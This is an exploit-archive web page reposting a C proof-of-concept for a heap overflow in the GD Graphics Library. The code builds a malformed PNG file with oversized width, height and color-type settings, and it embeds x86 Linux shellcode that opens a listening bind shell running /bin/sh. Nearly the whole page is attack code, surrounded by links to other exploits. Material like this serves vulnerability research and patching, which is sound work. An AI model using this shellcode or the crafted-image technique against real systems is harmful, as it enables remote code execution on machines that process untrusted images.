首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GD Graphics Library Heap Overflow Proof of Concept Exploit
来源:vfocus.net 作者:vfocus 发布时间:2004-10-27  

GD Graphics Library Heap Overflow Proof of Concept Exploit

#include <stdio.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <zlib.h>

#define OUTFILE "britnay_spares_pr0n.png"
#define BS 0x1000
#define ALIGN 0

#define die(x) do{ perror((x)); exit(EXIT_FAILURE);}while(0)

/*
* a chunk looks like:
* [ 4 byte len ] - just the length of data
* [ 4 byte id ] - identifies chunk data type
* [ 0+ data ] -
* [ 4 byte crc ] - covers the id and data
*/

/* identifies a file as a png */
#define MAJIC_LEN sizeof(png_majic)
u_char png_majic[] = { 0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a };

/* png id fields */
#define ID_LEN sizeof(png_ihdr_id)
u_char png_ihdr_id[] = { 73, 72, 68, 82 };
u_char png_idat_id[] = { 73, 68, 65, 84 };
u_char png_iend_id[] = { 73, 69, 78, 68 };


/*
* the iHDR chunk. image information.
*/
#define IHDR_LEN sizeof(png_ihdr)
struct _png_ihdr {
uint32_t len,
id,
width,
height;
uint8_t bit_depth,
color_type,
compress_meth,
filter_meth,
interlace_meth;
uint32_t crc;
} __attribute__((packed));
typedef struct _png_ihdr png_ihdr;


/*
* the iDAT chunk. the compressed data of image.
*/
#define IDAT_LEN sizeof(png_idat)
#define IDAT_DATA_SZ 512
struct _png_idat {
uint32_t len,
id;
u_char data[IDAT_DATA_SZ];
uint32_t crc;
} __attribute__((packed));
typedef struct _png_idat png_idat;


/*
* the iEND chunk. contains no data.
*/
#define IEND_LEN sizeof(png_iend)
struct _png_iend {
uint32_t len,
id,
crc;
} __attribute__((packed));
typedef struct _png_iend png_iend;


/* call them shell code */
#define SHELL_LEN strlen(sc)
char sc[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
int fd = 0, len = 0;
char *filename = OUTFILE;
u_char buf[BS] = { 0, };
u_long retaddr = 0;
png_ihdr ihdr;
png_idat idat;
png_iend iend;

#if 0
if(argc < 2){
fprintf(stderr, "Usage: %s < retaddr > [ outfile ]\n", argv[0]);
return EXIT_FAILURE;
}
if(argc > 2)
filename = argv[2];
sscanf(argv[1], "%lx", &retaddr);
#endif

#define PNG_USER_WIDTH_MAX 1000000L /* 0xf4240 */
/*
* setup png headers
*/
size_t a,b;
ihdr.len = htonl(0xd);
memcpy(&ihdr.id, png_ihdr_id, ID_LEN);
/*
* need to play with width and height, and also with color_type. depending
* on color_type value, rowbytes can be manipulated
*/
a = ihdr.width = htonl(0x8000);
b = ihdr.height = htonl(0x10000);
ihdr.bit_depth = 16;
ihdr.color_type = 4;
ihdr.compress_meth = 0x0;
ihdr.filter_meth = 0x0;
ihdr.interlace_meth = 0x0;
ihdr.crc = htonl(crc32(0, (u_char *)&ihdr.id, 17));

iend.len = 0x0;
memcpy(&iend.id, png_iend_id, ID_LEN);
iend.crc = htonl(crc32(0, (u_char *)&iend.id, 4));

idat.len = htonl(IDAT_DATA_SZ);
memcpy(&idat.id, png_idat_id, ID_LEN);
memset(idat.data, 'A', IDAT_DATA_SZ);
idat.crc = htonl(crc32(0, (u_char *)&idat.id, IDAT_DATA_SZ+4));

/*
* create buffer:
* png id - png ihdr - png idat - png iend
*/
memcpy(buf, png_majic, MAJIC_LEN);
len += MAJIC_LEN;
memcpy(buf+len, &ihdr, IHDR_LEN);
len += IHDR_LEN;
memcpy(buf+len, &idat, IDAT_LEN);
len += IDAT_LEN;
memcpy(buf+len, &iend, IEND_LEN);
len += IEND_LEN;

/* create the file */
if( (fd = open(filename, O_WRONLY|O_CREAT, 0666)) < 0)
die("open");
if(write(fd, buf, len) != len)
die("write");
close(fd);

return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·creating a asp command shell u
·libxml2 Remote buffer overflow
·ShixxNote 6.net, Remote Buffer
·MMDF deliver local root exploi
·Apache<=1.3.31 mod_include
·WvTftp option name heap overfl
·Ability Server <= 2.34 Remo
·Linux Kernel<= 2.6.7 Firewa
·Microsoft IIS WebDAV XML Denia
·MailCarrier 2.51 SMTP EHLO / H
·Microsoft Windows Metafile (.e
·Socat <= 1.4.0.2 Format Str
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved